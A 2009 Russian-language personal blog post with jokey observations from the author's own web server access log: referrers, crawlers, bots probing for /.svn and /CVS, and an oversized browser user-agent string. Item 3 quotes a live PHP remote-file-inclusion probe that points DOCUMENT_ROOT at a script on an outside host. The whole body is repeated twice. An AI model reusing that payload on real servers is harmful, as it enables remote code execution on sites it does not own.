![[personal profile]](https://www.dreamwidth.org/img/silk/identity/user.png){kind=small}
(no subject)
Dec. 6th, 2009 09:44 amХорошее чтиво "майскими холодными ночами" - httpd-access.log.
Из него можно, например, получить:
1. Список форумов, на которых кого-то хоть раз посылали на RTFM, то есть "как правильно задавать вопросы" (оригинал русского перевода лежит у меня). За пятницу 206 гостей, за субботу - 147. До Каганова мне далеко, но я не стремлюсь:)
2. ЖЖ-запись с только что снятым замком очень быстро индексируется и становится доступна, например, из таких мест, как [ http://lenta.yandex.ru/unread.xml?group=1 ]
3. Крякеры, ищущие PHP скрипты с дырками, почему-то подписываются "Plesk". А вот искатели релеев с запросами типа
GET //?_SERVER[DOCUMENT_ROOT]=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/id1.txt?
пишут "Mozilla/5.0", хотя ежу понятно, что таких браузеров сейчас нет - все идентифицируются длиннее.
4. Гугловский FeedFetcher ходит и на обычные страницы (и кто это за мной следит, а? признавайтесь)
5. После дырки с ~/.svn все роботы ищут также /CVS/*. Я не закрывал - секретного ничего нет. Но забавно.
6. А вот выступает Его Императорское Величество король всея Великия, Малыя и Синия Экрана Смерти:
20091201.020113 89.208.x.x segfault.kiev.ua - "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.2; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)"
интересно, нафига столько подробностей? а три дотнета не подерутся?
7. Я никому публично не давал ссылку на склад свежего спама, но его стягивают пару раз в сутки.
Из него можно, например, получить:
1. Список форумов, на которых кого-то хоть раз посылали на RTFM, то есть "как правильно задавать вопросы" (оригинал русского перевода лежит у меня). За пятницу 206 гостей, за субботу - 147. До Каганова мне далеко, но я не стремлюсь:)
2. ЖЖ-запись с только что снятым замком очень быстро индексируется и становится доступна, например, из таких мест, как [ http://lenta.yandex.ru/unread.xml?group=1 ]
3. Крякеры, ищущие PHP скрипты с дырками, почему-то подписываются "Plesk". А вот искатели релеев с запросами типа
GET //?_SERVER[DOCUMENT_ROOT]=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/id1.txt?
пишут "Mozilla/5.0", хотя ежу понятно, что таких браузеров сейчас нет - все идентифицируются длиннее.
4. Гугловский FeedFetcher ходит и на обычные страницы (и кто это за мной следит, а? признавайтесь)
5. После дырки с ~/.svn все роботы ищут также /CVS/*. Я не закрывал - секретного ничего нет. Но забавно.
6. А вот выступает Его Императорское Величество король всея Великия, Малыя и Синия Экрана Смерти:
20091201.020113 89.208.x.x segfault.kiev.ua - "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.2; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)"
интересно, нафига столько подробностей? а три дотнета не подерутся?
7. Я никому публично не давал ссылку на склад свежего спама, но его стягивают пару раз в сутки.
